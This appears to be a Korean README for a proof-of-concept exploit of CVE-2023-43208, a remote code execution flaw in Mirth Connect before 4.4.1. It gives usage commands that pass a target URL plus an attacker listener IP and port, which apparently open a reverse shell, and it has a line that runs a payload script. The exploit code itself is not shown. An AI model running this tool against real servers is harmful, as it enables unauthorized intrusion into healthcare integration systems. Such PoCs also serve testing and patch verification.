
취약점 악용
이 스크립트는 Mirth Connect (4.4.1 이전 버전)의 원격 코드 실행(RCE) 취약점에 대한 개념 증명(PoC)입니다. API를 통해 XStream 역직렬화 취약점을 악용합니다.
python3 CVE-2023-43208.py -u [https://IP-대상] -lh [공격자-IP] -lp [포트]
가상 환경 사용을 권장합니다:
python3 -m venv venv
source venv/bin/activate
pip install -r requirements.txt
#Payload 실행
python3 payload.py